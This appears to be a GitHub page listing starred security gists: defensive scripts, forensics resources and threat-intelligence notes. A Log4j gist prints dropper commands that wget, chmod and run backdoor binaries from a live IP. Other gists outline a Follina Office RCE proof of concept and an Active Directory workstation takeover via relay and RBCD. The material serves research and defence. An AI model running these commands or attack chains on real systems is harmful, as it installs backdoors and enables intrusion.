Skip to content

Instantly share code, notes, and snippets.

View CyberSecOps's full-sized avatar

Steve CyberSecOps

62 followers · 448 following
View GitHub Profile
@api0cradle
api0cradle / check_vulnerabledrivers.ps1
Created May 19, 2023 14:13
A quick script to check for vulnerable drivers. Compares drivers on system with list from loldrivers.io
# Simple script to check drivers in C:\windows\system32\drivers against the loldrivers list
# Author: Oddvar Moe - @oddvar.moe
$drivers = get-childitem -Path c:\windows\system32\drivers
$web_client = new-object system.net.webclient
$loldrivers = $web_client.DownloadString(" https://www.loldrivers.io/api/drivers.json") | ConvertFrom-Json
Write-output("Checking {0} drivers in C:\windows\system32\drivers against loldrivers.io json file" -f $drivers.Count)
foreach ($lol in $loldrivers.KnownVulnerableSamples)
{
@mvelazc0
mvelazc0 / attack_range.yml
Created March 23, 2023 15:14
general:
cloud_provider: aws
attack_range_password: AW^@#^%&^#@##
use_prebuilt_images_with_packer: '0'
key_name: yourkey-001423
ip_whitelist: 8.8.8.8 #your public ip address
attack_range_name: test-range
aws:
private_key_path: /Users/your/key-001423.key
region: us-west-2
@tothi
tothi / ms-msdt.MD
Last active April 18, 2024 02:22
The MS-MSDT 0-day Office RCE Proof-of-Concept Payload Building Process

MS-MSDT 0-day Office RCE

MS Office docx files may contain external OLE Object references as HTML files. There is an HTML sceme "ms-msdt:" which invokes the msdt diagnostic tool, what is capable of executing arbitrary code (specified in parameters).

The result is a terrifying attack vector for getting RCE through opening malicious docx files (without using macros).

Here are the steps to build a Proof-of-Concept docx:

  1. Open Word (used up-to-date 2019 Pro, 16.0.10386.20017), create a dummy document, insert an (OLE) object (as a Bitmap Image), save it in docx.
@Neo23x0
Neo23x0 / nvidia_cert_leak_vt_dorks.md
Created March 5, 2022 12:49
Samples Signed with NVIDIA Certs
@Purp1eW0lf
Purp1eW0lf / Pull_logs_and_zip.ps1
Created February 17, 2022 00:00
#Ensure errors don't ruin anything for us
$ErrorActionPreference = "SilentlyContinue"
# Set variables
$DesktopPath = [Environment]::GetFolderPath("Desktop")
$basic = "C:\windows\System32\winevt\Logs\Application.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-PowerShell%4Operational.evtx", "C:\windows\System32\winevt\Logs\System.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-Windows Defender%4Operational.evtx", "C:\windows\System32\winevt\Logs\Security.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-Sysmon%4Operational.evtx"
$remote_logs = "C:\windows\System32\winevt\Logs\Microsoft-Windows-TerminalServices-RemoteConnectionManager%4Operational.evtx", "C:\windows\System32\winevt\Logs\Microsoft-Windows-WinRM%4Operational.evtx"
@yt0ng
yt0ng / gist:8a87f4328c8c6cde327406ef11e68726
Last active December 15, 2021 03:13
Log4j Payload Dropped
45.130.229.168:1389/Exploit.class
Exploit.class 4d040caffa28e6a0fdc0d274547cf1c7983996fc33e51b0b2c511544f030d71b
--> curl http://18.228.7.109/.log/log
log d59dba711478b6c6fdba87a9cfc9af753783c4d9120111a9ef026c9362a8e74b
--> Download of Muhstik/Tsunami Backdoor
wget -O /tmp/pty3 http://18.228.7.109/.log/pty3; chmod +x /tmp/pty3; chmod 700 /tmp/pty3; /tmp/pty3 &
wget -O /tmp/pty4 http://18.228.7.109/.log/pty4; chmod +x /tmp/pty4; chmod 700 /tmp/pty4; /tmp/pty4 &
wget -O /tmp/pty2 http://18.228.7.109/.log/pty2; chmod +x /tmp/pty2; chmod 700 /tmp/pty2; /tmp/pty2 &
@0xmachos
0xmachos / macOS-IR-Forensics.md
Last active June 5, 2024 01:58
If someone wants to learn MacOS IR/forensics what’s the best resource for that?
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active June 23, 2024 22:01
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over Workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. This is accomplished in short by;

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

@MichaelKoczwara
MichaelKoczwara / Cobalt Strike servers 192.151.234.160 - 192.151.234.190
Last active April 10, 2021 11:35
Cobalt Strike servers 192.151.234.160 - 192.151.234.190
Cobalt Strike Servers:
192.151.234.160
192.151.234.161
192.151.234.162
192.151.234.163
192.151.234.164
192.151.234.165
192.151.234.166
192.151.234.167
@muff-in
muff-in / resources.md
Last active May 30, 2024 06:00
A curated list of Assembly Language / Reversing / Malware Analysis / Game Hacking-resources